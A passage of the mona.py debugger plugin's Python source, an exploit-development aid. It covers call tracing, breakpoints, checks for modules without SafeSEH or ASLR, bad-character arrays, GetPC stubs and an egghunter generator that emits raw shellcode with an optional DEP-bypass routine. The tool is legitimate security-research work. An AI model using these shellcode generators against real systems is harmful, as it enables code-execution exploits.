toignore.append("CallWindowProc")
toignore.append("HideCaret")
toignore.append("MessageBeep")
toignore.append("SetWindowText")
toignore.append("GetDlgItem")
toignore.append("SetFocus")
toignore.append("SetCursor")
toignore.append("LoadCursor")
toignore.append("SetEvent")
toignore.append("SetDlgItem")
toignore.append("SetWindowPos")
toignore.append("GetDC")
toignore.append("ReleaseDC")
toignore.append("GetDeviceCaps")
toignore.append("GetClientRect")
toignore.append("etLastError")
else:
limit_scope = False
if len( modulestosearch) > 0:
dbg.log("[+] Initializing log file")
logfile = MnLog("calltrace.txt")
thislog = logfile.reset()
dbg.log("[+] Number of CALL arguments to display : %d" % showargs)
dbg.log("[+] Finding instructions & placing hooks")
for thismod in modulestosearch:
dbg.updateLog()
objMod = dbg.getModule(thismod)
if not objMod.isAnalysed:
dbg.log(" Analysing code...")
objMod.Analyse()
themod = MnModule(thismod)
modcodebase = themod.moduleCodebase
modcodetop = themod.moduleCodetop
dbg.setStatusBar("Placing hooks in %s..." % thismod)
dbg.log(" * %s (0x%08x - 0x%08x)" % (thismod,modcodebase,modcodetop))
ccnt = 0
rcnt = 0
thisaddr = modcodebase
allfuncs = dbg.getAllFunctions(modcodebase)
for func in allfuncs:
thisaddr = func
thisfunc = dbg.getFunction(thisaddr)
instrcnt = 0
while thisfunc.hasAddress(thisaddr):
try:
if instrcnt == 0:
thisopcode = dbg.disasm(thisaddr)
else:
thisopcode = dbg.disasmForward(thisaddr,1)
thisaddr = thisopcode.getAddress()
instruction = getDisasmInstruction(thisopcode)
if instruction.startswith("CALL "):
ignore_this_instruction = False
for ignores in toignore:
if instruction.lower().find(ignores.lower()) > -1:
ignore_this_instruction = True
break
if not ignore_this_instruction:
if not thisaddr in hooks:
hooks.append(thisaddr)
myhook = MnCallTraceHook(thisaddr,showargs,instruction,thislog)
myhook.add("HOOK_CT_%s" % thisaddr , thisaddr)
ccnt += 1
if hookrets and instruction.startswith("RETN"):
if not thisaddr in rethooks:
rethooks.append(thisaddr)
myhook = MnCallTraceHook(thisaddr,showargs,instruction,thislog)
myhook.add("HOOK_CT_%s" % thisaddr , thisaddr)
except:
#dbg.logLines(traceback.format_exc(),highlight=True)
break
instrcnt += 1
dbg.log("[+] Total number of CALL hooks placed : %d" % len(hooks))
if hookrets:
dbg.log("[+] Total number of RETN hooks placed : %d" % len(rethooks))
else:
dbg.log("[!] No modules selected or found",highlight=1)
return "Done"
# ----- bu: set a deferred breakpoint ---- #
def procBu(args):
if not "a" in args:
dbg.log("No targets defined. (-a)",highlight=1)
return
else:
allargs = args["a"]
bpargs = allargs.split(",")
breakpoints = {}
dbg.log("")
dbg.log("Received %d addresses//functions to process" % len(bpargs))
# set a breakpoint right away for addresses and functions that are mapped already
for tbparg in bpargs:
bparg = tbparg.replace(" ","")
# address or module.function ?
if bparg.find(".") > -1:
functionaddress = dbg.getAddress(bparg)
if functionaddress > 0:
# module.function is already mapped, we can set a bp right away
dbg.setBreakpoint(functionaddress)
breakpoints[bparg] = True
dbg.log("Breakpoint set at 0x%08x (%s), was already mapped" % (functionaddress,bparg), highlight=1)
else:
breakpoints[bparg] = False # no breakpoint set yet
elif bparg.find("+") > -1:
ptrparts = bparg.split("+")
modname = ptrparts[0]
if not modname.lower().endswith(".dll"):
modname += ".dll"
themodule = getModuleObj(modname)
if themodule != None and len(ptrparts) > 1:
address = themodule.getBase() + int(ptrparts[1],16)
if address > 0:
dbg.log("Breakpoint set at %s (0x%08x), was already mapped" % (bparg,address),highlight=1)
dbg.setBreakpoint(address)
breakpoints[bparg] = True
else:
breakpoints[bparg] = False
else:
breakpoints[bparg] = False
if bparg.find(".") == -1 and bparg.find("+") == -1:
# address, see if it is mapped, by reading one byte from that location
address = -1
try:
address = int(bparg,16)
except:
pass
thispage = dbg.getMemoryPageByAddress(address)
if thispage != None:
dbg.setBreakpoint(address)
dbg.log("Breakpoint set at 0x%08x, was already mapped" % address, highlight=1)
breakpoints[bparg] = True
else:
breakpoints[bparg] = False
# get the correct addresses to put hook on
loadlibraryA = dbg.getAddress("kernel32.LoadLibraryA")
loadlibraryW = dbg.getAddress("kernel32.LoadLibraryW")
if loadlibraryA > 0 and loadlibraryW > 0:
# find end of function for each
endAfound = False
endWfound = False
cnt = 1
while not endAfound:
objInstr = dbg.disasmForward(loadlibraryA, cnt)
strInstr = getDisasmInstruction(objInstr)
if strInstr.startswith("RETN"):
endAfound = True
loadlibraryA = objInstr.getAddress()
cnt += 1
cnt = 1
while not endWfound:
objInstr = dbg.disasmForward(loadlibraryW, cnt)
strInstr = getDisasmInstruction(objInstr)
if strInstr.startswith("RETN"):
endWfound = True
loadlibraryW = objInstr.getAddress()
cnt += 1
# if addresses/functions are left, throw them into their own hooks,
# one for each LoadLibrary type.
hooksplaced = False
for bptarget in breakpoints:
if not breakpoints[bptarget]:
myhookA = MnDeferredHook(loadlibraryA, bptarget)
myhookA.add("HOOK_A_%s" % bptarget, loadlibraryA)
myhookW = MnDeferredHook(loadlibraryW, bptarget)
myhookW.add("HOOK_W_%s" % bptarget, loadlibraryW)
dbg.log("Hooks for %s installed" % bptarget)
hooksplaced = True
if not hooksplaced:
dbg.log("No hooks placed")
else:
dbg.log("** Unable to place hooks, make sure kernel32.dll is loaded",highlight=1)
return "Done"
# ----- bf: Set a breakpoint on exported functions of a module ----- #
def procBf(args):
funcfilter = ""
mode = ""
type = "export"
modes = ["add","del","list"]
types = ["import","export","iat","eat"]
modulecriteria={}
criteria={}
modulecriteria,criteria = args2criteria(args,modulecriteria,criteria)
if "s" in args:
try:
funcfilter = args["s"].lower()
except:
dbg.log("No functions selected. (-s)",highlight=1)
return
else:
dbg.log("No functions selected. (-s)",highlight=1)
return
if "t" in args:
try:
mode = args["t"].lower()
except:
pass
if "f" in args:
try:
type = args["f"].lower()
except:
pass
if not type in types:
dbg.log("No valid function type selected (-f <import|export>)",highlight=1)
return
if not mode in modes or mode=="":
dbg.log("No valid action defined. (-t add|del|list)")
doManageBpOnFunc(modulecriteria,criteria,funcfilter,mode,type)
return
# ----- Show info about modules -------#
def procModInfoS(args):
modulecriteria = {}
criteria = {}
modulecriteria["safeseh"] = False
dbg.log("Safeseh unprotected modules :")
modulestosearch = getModulesToQuery(modulecriteria)
showModuleTable("",modulestosearch)
return
def procModInfoSA(args):
modulecriteria = {}
criteria = {}
modulecriteria["safeseh"] = False
modulecriteria["aslr"] = False
modulecriteria["rebase"] = False
dbg.log("Safeseh unprotected, no aslr & no rebase modules :")
modulestosearch = getModulesToQuery(modulecriteria)
showModuleTable("",modulestosearch)
return
def procModInfoA(args):
modulecriteria = {}
criteria = {}
modulecriteria["aslr"] = False
modulecriteria["rebase"] = False
dbg.log("No aslr & no rebase modules :")
modulestosearch = getModulesToQuery(modulecriteria)
showModuleTable("",modulestosearch)
return
# ----- Print byte array ----- #
def procByteArray(args):
badchars = ""
forward = True
startval = 0
endval = 255
sign = 1
bytesperline = 32
if "b" in args:
dbg.log(" *** Note: parameter -b has been deprecated and replaced with -cpb ***")
if type(args["b"]).__name__.lower() != "bool":
if not "cpb" in args:
args["cpb"] = args["b"]
if "r" in args:
forward = False
startval = -255
endval = 0
sign = -1
badchars = ""
if "cpb" in args:
badchars = args["cpb"]
badchars = badchars.replace("'","")
badchars = badchars.replace('"',"")
badchars = badchars.replace("\\x","")
# see if we need to expand ..
bpos = 0
newbadchars = ""
while bpos < len(badchars):
curchar = badchars[bpos]+badchars[bpos+1]
if curchar == "..":
pos = bpos
if pos > 1 and pos <= len(badchars)-4:
# get byte before and after ..
bytebefore = badchars[pos-2] + badchars[pos-1]
byteafter = badchars[pos+2] + badchars[pos+3]
bbefore = int(bytebefore,16)
bafter = int(byteafter,16)
insertbytes = ""
bbefore += 1
while bbefore < bafter:
insertbytes += "%02x" % bbefore
bbefore += 1
newbadchars += insertbytes
else:
newbadchars += curchar
bpos += 2
badchars = newbadchars
cnt = 0
strb = ""
while cnt < len(badchars):
strb=strb+binascii.a2b_hex(badchars[cnt]+badchars[cnt+1])
cnt=cnt+2
dbg.log("Generating table, excluding %d bad chars..." % len(strb))
arraytable = []
binarray = ""
while startval <= endval:
thisval = startval * sign
hexbyte = hex(thisval)[2:]
binbyte = hex2bin(toHexByte(thisval))
if len(hexbyte) == 1:
hexbyte = "0" + hexbyte
hexbyte2 = binascii.a2b_hex(hexbyte)
if not hexbyte2 in strb:
arraytable.append(hexbyte)
binarray += binbyte
startval += 1
dbg.log("Dumping table to file")
output = ""
cnt = 0
outputline = '"'
totalbytes = len(arraytable)
tablecnt = 0
while tablecnt < totalbytes:
if (cnt < bytesperline):
outputline += "\\x" + arraytable[tablecnt]
else:
outputline += '"\n'
cnt = 0
output += outputline
outputline = '"\\x' + arraytable[tablecnt]
tablecnt += 1
cnt += 1
if (cnt-1) < bytesperline:
outputline += '"\n'
output += outputline
global ignoremodules
ignoremodules = True
arrayfilename="bytearray.txt"
objarrayfile = MnLog(arrayfilename)
arrayfile = objarrayfile.reset()
binfilename = arrayfile.replace("bytearray.txt","bytearray.bin")
objarrayfile.write(output,arrayfile)
ignoremodules = False
dbg.logLines(output)
dbg.log("")
binfile = open(binfilename,"wb")
binfile.write(binarray)
binfile.close()
dbg.log("Done, wrote %d bytes to file %s" % (len(arraytable),arrayfile))
dbg.log("Binary output saved in %s" % binfilename)
return
#----- Read binary file, print 'nice' header -----#
def procPrintHeader(args):
alltypes = ["ruby","rb","python","py"]
thistype = "ruby"
filename = ""
typewrong = False
stopnow = False
if "f" in args:
if type(args["f"]).__name__.lower() != "bool":
filename = args["f"]
if "t" in args:
if type(args["t"]).__name__.lower() != "bool":
if args["t"] in alltypes:
thistype = args["t"]
else:
typewrong = True
else:
typewrong = True
if typewrong:
dbg.log("Invalid type specified with option -t. Valid types are: %s" % alltypes,highlight=1)
stopnow = True
else:
if thistype == "rb":
thistype = "ruby"
if thistype == "py":
thistype = "python"
if filename == "":
dbg.log("Missing argument -f <source filename>",highlight=1)
stopnow = True
if stopnow:
return
filename = filename.replace("'","").replace('"',"")
content = ""
try:
file = open(filename,"rb")
content = file.read()
file.close()
except:
dbg.log("Unable to read file %s" % filename,highlight=1)
return
dbg.log("Read %d bytes from %s" % (len(content),filename))
dbg.log("Output type: %s" % thistype)
cnt = 0
linecnt = 0
output = ""
thisline = ""
max = len(content)
addchar = "<<"
if thistype == "python":
addchar = "+="
while cnt < max:
# first check for unicode
if cnt < max-1:
if linecnt == 0:
thisline = "header = \""
else:
thisline = "header %s \"" % addchar
thiscnt = cnt
while cnt < max-1 and isAscii2(ord(content[cnt])) and ord(content[cnt+1]) == 0:
if content[cnt] == "\\":
thisline += "\\"
if content[cnt] == "\"":
thisline += "\\"
thisline += "%s\\x00" % content[cnt]
cnt += 2
if thiscnt != cnt:
output += thisline + "\"" + "\n"
linecnt += 1
if linecnt == 0:
thisline = "header = \""
else:
thisline = "header %s \"" % addchar
thiscnt = cnt
# ascii repetitions
reps = 1
startval = content[cnt]
if isAscii(ord(content[cnt])):
while cnt < max-1:
if startval == content[cnt+1]:
reps += 1
cnt += 1
else:
break
if reps > 1:
if startval == "\\":
startval += "\\"
if startval == "\"":
startval = "\\" + "\""
output += thisline + startval + "\" * " + str(reps) + "\n"
cnt += 1
linecnt += 1
continue
if linecnt == 0:
thisline = "header = \""
else:
thisline = "header %s \"" % addchar
thiscnt = cnt
# check for just ascii
while cnt < max and isAscii2(ord(content[cnt])):
if cnt < max-1 and ord(content[cnt+1]) == 0:
break
if content[cnt] == "\\":
thisline += "\\"
if content[cnt] == "\"":
thisline += "\\"
thisline += content[cnt]
cnt += 1
if thiscnt != cnt:
output += thisline + "\"" + "\n"
linecnt += 1
#check others : repetitions
if cnt < max:
if linecnt == 0:
thisline = "header = \""
else:
thisline = "header %s \"" % addchar
thiscnt = cnt
while cnt < max:
if isAscii2(ord(content[cnt])):
break
if cnt < max-1 and isAscii2(ord(content[cnt])) and ord(content[cnt+1]) == 0:
break
#check repetitions
reps = 1
startval = ord(content[cnt])
while cnt < max-1:
if startval == ord(content[cnt+1]):
reps += 1
cnt += 1
else:
break
if reps > 1:
if len(thisline) > 12:
output += thisline + "\"" + "\n"
if linecnt == 0:
thisline = "header = \"\\x" + "%02x\" * %d" % (startval,reps)
else:
thisline = "header %s \"\\x" % addchar
thisline += "%02x\" * %d" % (startval,reps)
output += thisline + "\n"
thisline = "header %s \"" % addchar
linecnt += 1
else:
thisline += "\\x" + "%02x" % ord(content[cnt])
cnt += 1
if thiscnt != cnt:
if len(thisline) > 12:
output += thisline + "\"" + "\n"
linecnt += 1
global ignoremodules
ignoremodules = True
headerfilename="header.txt"
objheaderfile = MnLog(headerfilename)
headerfile = objheaderfile.reset()
objheaderfile.write(output,headerfile)
ignoremodules = False
if not silent:
dbg.log("-" * 30)
dbg.logLines(output)
dbg.log("-" * 30)
dbg.log("Wrote header to %s" % headerfile)
return
#----- Update -----#
def procUpdate(args):
"""
Function to update mona and optionally windbglib to the latest version
Arguments : none
Returns : new version of mona/windbglib (if available)
"""
updateproto = "https"
#if "http" in args:
# updateproto = "http"
#debugger version
imversion = __IMM__
#url
dbg.setStatusBar("Running update process...")
dbg.updateLog()
updateurl = "https://github.com/corelan/mona/raw/master/mona.py"
#if updateproto == "http":
# updateurl = "http://redmine.corelan.be/projects/mona/repository/git/revisions/master/raw/mona.py"
currentversion,currentrevision = getVersionInfo(inspect.stack()[0][1])
u = ""
try:
u = urllib.urlretrieve(updateurl)
newversion,newrevision = getVersionInfo(u[0])
if newversion != "" and newrevision != "":
dbg.log("[+] Version compare :")
dbg.log(" Current Version : %s, Current Revision : %s" % (currentversion,currentrevision))
dbg.log(" Latest Version : %s, Latest Revision : %s" % (newversion,newrevision))
else:
dbg.log("[-] Unable to check latest version (corrupted file ?), try again later",highlight=1)
return
except:
dbg.log("[-] Unable to check latest version (download error), run !mona update -http or try again later",highlight=1)
return
#check versions
doupdate = False
if newversion != "" and newrevision != "":
if currentversion != newversion:
doupdate = True
else:
if int(currentrevision) < int(newrevision):
doupdate = True
if doupdate:
dbg.log("[+] New version available",highlight=1)
dbg.log(" Updating to %s r%s" % (newversion,newrevision),highlight=1)
try:
shutil.copyfile(u[0],inspect.stack()[0][1])
dbg.log(" Done")
except:
dbg.log(" ** Unable to update mona.py",highlight=1)
currentversion,currentrevision = getVersionInfo(inspect.stack()[0][1])
dbg.log("[+] Current version : %s r%s" % (currentversion,currentrevision))
else:
dbg.log("[+] You are running the latest version")
# update windbglib if needed
if __DEBUGGERAPP__ == "WinDBG":
dbg.log("[+] Locating windbglib path")
paths = sys.path
filefound = False
libfile = ""
for ppath in paths:
libfile = ppath + "\\windbglib.py"
if os.path.isfile(libfile):
filefound=True
break
if not filefound:
dbg.log(" ** Unable to find windbglib.py ! **")
else:
dbg.log("[+] Checking if %s needs an update..." % libfile)
updateurl = "https://github.com/corelan/windbglib/raw/master/windbglib.py"
#if updateproto == "http":
# updateurl = updateproto + "://redmine.corelan.be/projects/windbglib/repository/raw/windbglib.py"
currentversion,currentrevision = getVersionInfo(libfile)
u = ""
try:
u = urllib.urlretrieve(updateurl)
newversion,newrevision = getVersionInfo(u[0])
if newversion != "" and newrevision != "":
dbg.log("[+] Version compare :")
dbg.log(" Current Version : %s, Current Revision : %s" % (currentversion,currentrevision))
dbg.log(" Latest Version : %s, Latest Revision : %s" % (newversion,newrevision))
else:
dbg.log("[-] Unable to check latest version (corrupted file ?), try again later",highlight=1)
return
except:
dbg.log("[-] Unable to check latest version (download error), run !mona update -http or try again later",highlight=1)
return
#check versions
doupdate = False
if newversion != "" and newrevision != "":
if currentversion != newversion:
doupdate = True
else:
if int(currentrevision) < int(newrevision):
doupdate = True
if doupdate:
dbg.log("[+] New version available",highlight=1)
dbg.log(" Updating to %s r%s" % (newversion,newrevision),highlight=1)
try:
shutil.copyfile(u[0],libfile)
dbg.log(" Done")
except:
dbg.log(" ** Unable to update windbglib.py",highlight=1)
currentversion,currentrevision = getVersionInfo(libfile)
dbg.log("[+] Current version : %s r%s" % (currentversion,currentrevision))
else:
dbg.log("[+] You are running the latest version")
dbg.setStatusBar("Done.")
return
#----- GetPC -----#
def procgetPC(args):
r32 = ""
output = ""
if "r" in args:
if type(args["r"]).__name__.lower() != "bool":
r32 = args["r"].lower()
if r32 == "" or not "r" in args:
dbg.log("Missing argument -r <register>",highlight=1)
return
opcodes = {}
opcodes["eax"] = "\\x58"
opcodes["ecx"] = "\\x59"
opcodes["edx"] = "\\x5a"
opcodes["ebx"] = "\\x5b"
opcodes["esp"] = "\\x5c"
opcodes["ebp"] = "\\x5d"
opcodes["esi"] = "\\x5e"
opcodes["edi"] = "\\x5f"
calls = {}
calls["eax"] = "\\xd0"
calls["ecx"] = "\\xd1"
calls["edx"] = "\\xd2"
calls["ebx"] = "\\xd3"
calls["esp"] = "\\xd4"
calls["ebp"] = "\\xd5"
calls["esi"] = "\\xd6"
calls["edi"] = "\\xd7"
output = "\n" + r32 + "| jmp short back:\n\"\\xeb\\x03" + opcodes[r32] + "\\xff" + calls[r32] + "\\xe8\\xf8\\xff\\xff\\xff\"\n"
output += r32 + "| call + 4:\n\"\\xe8\\xff\\xff\\xff\\xff\\xc3" + opcodes[r32] + "\"\n"
output += r32 + "| fstenv:\n\"\\xd9\\xeb\\x9b\\xd9\\x74\\x24\\xf4" + opcodes[r32] + "\"\n"
global ignoremodules
ignoremodules = True
getpcfilename="getpc.txt"
objgetpcfile = MnLog(getpcfilename)
getpcfile = objgetpcfile.reset()
objgetpcfile.write(output,getpcfile)
ignoremodules = False
dbg.logLines(output)
dbg.log("")
dbg.log("Wrote to file %s" % getpcfile)
return
#----- Egghunter -----#
def procEgg(args):
filename = ""
egg = "w00t"
usechecksum = False
usewow64 = False
useboth = False
egg_size = 0
checksumbyte = ""
extratext = ""
global silent
oldsilent = silent
silent = True
if "f" in args:
if type(args["f"]).__name__.lower() != "bool":
filename = args["f"]
filename = filename.replace("'", "").replace("\"", "")
#Set egg
if "t" in args:
if type(args["t"]).__name__.lower() != "bool":
egg = args["t"]
if "wow64" in args:
usewow64 = True
# placeholder for later
if "both" in args:
useboth = True
if len(egg) != 4:
egg = 'w00t'
dbg.log("[+] Egg set to %s" % egg)
if "c" in args:
if filename != "":
usechecksum = True
dbg.log("[+] Hunter will include checksum routine")
else:
dbg.log("Option -c only works in conjunction with -f <filename>",highlight=1)
return
startreg = ""
if "startreg" in args:
if isReg(args["startreg"]):
startreg = args["startreg"].lower()
dbg.log("[+] Egg will start search at %s" % startreg)
depmethods = ["virtualprotect","copy","copy_size"]
depreg = "esi"
depsize = 0
freeregs = [ "ebx","ecx","ebp","esi" ]
regsx = {}
# 0 : mov xX
# 1 : push xX
# 2 : mov xL
# 3 : mov xH
#
regsx["eax"] = ["\x66\xb8","\x66\x50","\xb0","\xb4"]
regsx["ebx"] = ["\x66\xbb","\x66\x53","\xb3","\xb7"]
regsx["ecx"] = ["\x66\xb9","\x66\x51","\xb1","\xb5"]
regsx["edx"] = ["\x66\xba","\x66\x52","\xb2","\xb6"]
regsx["esi"] = ["\x66\xbe","\x66\x56"]
regsx["edi"] = ["\x66\xbf","\x66\x57"]
regsx["ebp"] = ["\x66\xbd","\x66\x55"]
regsx["esp"] = ["\x66\xbc","\x66\x54"]
addreg = {}
addreg["eax"] = "\x83\xc0"
addreg["ebx"] = "\x83\xc3"
addreg["ecx"] = "\x83\xc1"
addreg["edx"] = "\x83\xc2"
addreg["esi"] = "\x83\xc6"
addreg["edi"] = "\x83\xc7"
addreg["ebp"] = "\x83\xc5"
addreg["esp"] = "\x83\xc4"
depdest = ""
depmethod = ""
getpointer = ""
getsize = ""
getpc = ""
jmppayload = "\xff\xe7"
if "depmethod" in args:
if args["depmethod"].lower() in depmethods:
depmethod = args["depmethod"].lower()
dbg.log("[+] Hunter will include routine to bypass DEP on found shellcode")
# other DEP related arguments ?
# depreg
# depdest
# depsize
if "depreg" in args:
if isReg(args["depreg"]):
depreg = args["depreg"].lower()
if "depdest" in args:
if isReg(args["depdest"]):
depdest = args["depdest"].lower()
if "depsize" in args:
try:
depsize = int(args["depsize"])
except:
dbg.log(" ** Invalid depsize",highlight=1)
return
#read payload file
data = ""
if filename != "":
try:
f = open(filename, "rb")
data = f.read()
f.close()
dbg.log("[+] Read payload file (%d bytes)" % len(data))
except:
dbg.log("Unable to read file %s" %filename, highlight=1)
return
#let's start
egghunter = ""
if not usewow64:
#Basic version of egghunter
dbg.log("[+] Generating traditional 32bit egghunter code")
egghunter = ""
egghunter += (
"\x66\x81\xca\xff\x0f"+ #or dx,0xfff
"\x42"+ #INC EDX
"\x52" #push edx
"\x6a\x02" #push 2 (NtAccessCheckAndAuditAlarm syscall)
"\x58" #pop eax
"\xcd\x2e" #int 0x2e
"\x3c\x05" #cmp al,5
"\x5a" #pop edx
"\x74\xef" #je "or dx,0xfff"
"\xb8"+egg+ #mov eax, egg
"\x8b\xfa" #mov edi,edx
"\xaf" #scasd
"\x75\xea" #jne "inc edx"
"\xaf" #scasd
"\x75\xe7" #jne "inc edx"
)
if usewow64:
egghunter = ""
egghunter += (
# 64 stub needed before loop
"\x31\xdb" #xor ebx,ebx
"\x53" #push ebx
"\x53" #push ebx
"\x53" #push ebx
"\x53" #push ebx
"\xb3\xc0" #mov bl,0xc0
# 64 Loop
"\x66\x81\xCA\xFF\x0F" #OR DX,0FFF
"\x42" #INC EDX
"\x52" #PUSH EDX
"\x6A\x26" #PUSH 26
"\x58" #POP EAX
"\x33\xC9" #XOR ECX,ECX
"\x8B\xD4" #MOV EDX,ESP
"\x64\xff\x13" #CALL DWORD PTR FS:[ebx]
"\x5e" #POP ESI
"\x5a" #POP EDX
"\x3C\x05" #CMP AL,5
"\x74\xe9" #JE SHORT
"\xB8"+egg+ #MOV EAX,74303077 w00t
"\x8B\xFA" #MOV EDI,EDX
"\xAF" #SCAS DWORD PTR ES:[EDI]
"\x75\xe4" #JNZ "inc edx"
"\xAF" #SCAS DWORD PTR ES:[EDI]
"\x75\xe1" #JNZ "inc edx"
)
if usechecksum:
dbg.log("[+] Generating checksum routine")
extratext = "+ checksum routine"
egg_size = ""
if len(data) < 256:
cmp_reg = "\x80\xf9" #cmp cl,value
egg_size = hex2bin("%x" % len(data))
offset1 = "\xf7"
offset2 = "\xd3"
elif len(data) < 65536:
cmp_reg = "\x66\x81\xf9" #cmp cx,value
#avoid nulls
egg_size_normal = "%04X" % len(data)
while egg_size_normal[0:2] == "00" or egg_size_normal[2:4] == "00":
data += "\x90"
egg_size_normal = "%04X" % len(data)
egg_size = hex2bin(egg_size_normal[2:4]) + hex2bin(egg_size_normal[0:2])
offset1 = "\xf5"
offset2 = "\xd1"
else:
dbg.log("Cannot use checksum code with this payload size (way too big)",highlight=1)
return
sum = 0
for byte in data:
sum += ord(byte)
sumstr= toHex(sum)
checksumbyte = sumstr[len(sumstr)-2:len(sumstr)]
egghunter += (
"\x51" #push ecx
"\x31\xc9" #xor ecx,ecx
"\x31\xc0" #xor eax,eax
"\x02\x04\x0f" #add al,byte [edi+ecx]
"\x41"+ #inc ecx
cmp_reg + egg_size + #cmp cx/cl, value
"\x75" + offset1 + #jnz "add al,byte [edi+ecx]
"\x3a\x04\x39" + #cmp al,byte [edi+ecx]
"\x59" + #pop ecx
"\x75" + offset2 #jnz "inc edx"
)
#dep bypass ?
if depmethod != "":
dbg.log("[+] Generating dep bypass routine")
if not depreg in freeregs:
getpointer += "mov " + freeregs[0] +"," + depreg + "#"
depreg = freeregs[0]
freeregs.remove(depreg)
if depmethod == "copy" or depmethod == "copy_size":
if depdest != "":
if not depdest in freeregs:
getpointer += "mov " + freeregs[0] + "," + depdest + "#"
depdest = freeregs[0]
else:
getpc = "\xd9\xee" # fldz
getpc += "\xd9\x74\xe4\xf4" # fstenv [esp-0c]
depdest = freeregs[0]
getpc += hex2bin(assemble("pop "+depdest))
freeregs.remove(depdest)
sizereg = freeregs[0]
if depsize == 0:
# set depsize to payload * 2 if we are using a file
depsize = len(data) * 2
if depmethod == "copy_size":
depsize = len(data)
if depsize == 0:
dbg.log("** Please specify a valid -depsize when you are not using -f **",highlight=1)
return
else:
if depsize <= 127:
#simply push it to the stack
getsize = "\x6a" + hex2bin("\\x" + toHexByte(depsize))
else:
#can we do it with 16bit reg, no nulls ?
if depsize <= 65535:
sizeparam = toHex(depsize)[4:8]
getsize = hex2bin(assemble("xor "+sizereg+","+sizereg))
if not (sizeparam[0:2] == "00" or sizeparam[2:4] == "00"):
#no nulls, hooray, write to xX
getsize += regsx[sizereg][0]+hex2bin("\\x" + sizeparam[2:4] + "\\x" + sizeparam[0:2])
else:
# write the non null if we can
if len(regsx[sizereg]) > 2:
if not (sizeparam[0:2] == "00"):
# write to xH
getsize += regsx[sizereg][3] + hex2bin("\\x" + sizeparam[0:2])
if not (sizeparam[2:4] == "00"):
# write to xL
getsize += regsx[sizereg][2] + hex2bin("\\x" + sizeparam[2:4])
else:
#we have to write the full value to sizereg
blockcnt = 0
vpsize = 0
blocksize = depsize
while blocksize >= 127:
blocksize = blocksize / 2
blockcnt += 1
if blockcnt > 0:
getsize += addreg[sizereg] + hex2bin("\\x" + toHexByte(blocksize))
vpsize = blocksize
depblockcnt = 0
while depblockcnt < blockcnt:
getsize += hex2bin(assemble("add "+sizereg+","+sizereg))
vpsize += vpsize
depblockcnt += 1
delta = depsize - vpsize
if delta > 0:
getsize += addreg[sizereg] + hex2bin("\\x" + toHexByte(delta))
else:
getsize += addreg[sizereg] + hex2bin("\\x" + toHexByte(depsize))
# finally push
getsize += hex2bin(assemble("push "+ sizereg))
else:
dbg.log("** Shellcode size (depsize) is too big",highlight=1)
return
#finish it off
if depmethod == "virtualprotect":
jmppayload = "\x54\x6a\x40"
jmppayload += getsize
jmppayload += hex2bin(assemble("#push edi#push edi#push "+depreg+"#ret"))
elif depmethod == "copy":
jmppayload = hex2bin(assemble("push edi\push "+depdest+"#push "+depdest+"#push "+depreg+"#mov edi,"+depdest+"#ret"))
elif depmethod == "copy_size":
jmppayload += getsize
jmppayload += hex2bin(assemble("push edi#push "+depdest+"#push " + depdest + "#push "+depreg+"#mov edi,"+depdest+"#ret"))
#jmp to payload
egghunter += getpc
egghunter += jmppayload
startat = ""
skip = ""
#start at a certain reg ?
if startreg != "":
if startreg != "edx":
startat = hex2bin(assemble("mov edx," + startreg))
skip = "\xeb\x05"
egghunter = skip + egghunter
#pickup pointer for DEP bypass ?
egghunter = hex2bin(assemble(getpointer)) + egghunter
egghunter = startat + egghunter
silent = oldsilent
#Convert binary to printable hex format
egghunter_hex = toniceHex(egghunter.strip().replace(" ",""),16)
global ignoremodules
ignoremodules = True
hunterfilename="egghunter.txt"
objegghunterfile = MnLog(hunterfilename)
egghunterfile = objegghunterfile.reset()
dbg.log("[+] Egghunter %s (%d bytes): " % (extratext,len(egghunter.strip().replace(" ",""))))
dbg.logLines("%s" % egghunter_hex)
objegghunterfile.write("Egghunter " + extratext + ", tag " + egg + " : ",egghunterfile)
objegghunterfile.write(egghunter_hex,egghunterfile)
if filename == "":
objegghunterfile.write("Put this tag in front of your shellcode : " + egg + egg,egghunterfile)
else:
dbg.log("[+] Shellcode, with tag : ")
block = "\"" + egg + egg + "\"\n"
cnt = 0
flip = 1
thisline = "\""
while cnt < len(data):
thisline += "\\x%s" % toHexByte(ord(data[cnt]))
if (flip == 32) or (cnt == len(data)-1):
if cnt == len(data)-1 and checksumbyte != "":
thisline += "\\x%s" % checksumbyte
thisline += "\""
flip = 0
block += thisline
block += "\n"
thisline = "\""
cnt += 1
flip += 1
dbg.logLines(block)
objegghunterfile.write("\nShellcode, with tag :\n",egghunterfile)
objegghunterfile.write(block,egghunterfile)
ignoremodules = False
return
#----- Find MSP ------ #
def procFindMSP(args):
distance = 0
if "distance" in args:
try:
distance = int(args["distance"])
except:
distance = 0
if distance < 0:
dbg.log("** Please provide a positive number as distance",highlight=1)
return
mspresults = {}
mspresults = goFindMSP(distance,args)
return
def procSuggest(args):
modulecriteria={}
criteria={}
modulecriteria,criteria = args2criteria(args,modulecriteria,criteria)
isEIP = False
isSEH = False
isEIPUnicode = False
isSEHUnicode = False
initialoffsetSEH = 0
initialoffsetEIP = 0
shellcodesizeSEH = 0
shellcodesizeEIP = 0
nullsallowed = True
global ignoremodules
global noheader
global ptr_to_get
global silent
global ptr_counter
targetstr = ""
exploitstr = ""
originalauthor = ""
url = ""
#are we attached to an application ?
if dbg.getDebuggedPid() == 0:
dbg.log("** You don't seem to be attached to an application ! **",highlight=1)
return
exploittype = ""
skeletonarg = ""
usecliargs = False
validstypes ={}
validstypes["tcpclient"] = "network client (tcp)"
validstypes["udpclient"] = "network client (udp)"
validstypes["fileformat"] = "fileformat"
exploittypes = [ "fileformat","network client (tcp)","network client (udp)" ]
if __DEBUGGERAPP__ == "WinDBG" or "t" in args:
if "t" in args:
if type(args["t"]).__name__.lower() != "bool":
skeltype = args["t"].lower()
skelparts = skeltype.split(":")
if skelparts[0] in validstypes:
exploittype = validstypes[skelparts[0]]
if len(skelparts) > 1:
skeletonarg = skelparts[1]
else:
dbg.log(" ** Please specify the skeleton type AND an argument. **")
return
usecliargs = True
else:
dbg.log(" ** Please specify a valid skeleton type and an argument. **")
return
else:
dbg.log(" ** Please specify a skeletontype using -t **",highlight=1)
return
else:
dbg.log(" ** Please specify a skeletontype using -t **",highlight=1)
return
mspresults = {}
mspresults = goFindMSP(100,args)
#create metasploit skeleton file
exploitfilename="exploit.rb"
objexploitfile = MnLog(exploitfilename)
#ptr_to_get = 5
noheader = True
ignoremodules = True
exploitfile = objexploitfile.reset()
ignoremodules = False
noheader = False
dbg.log(" ")
dbg.log("[+] Preparing payload...")
dbg.log(" ")
dbg.updateLog()
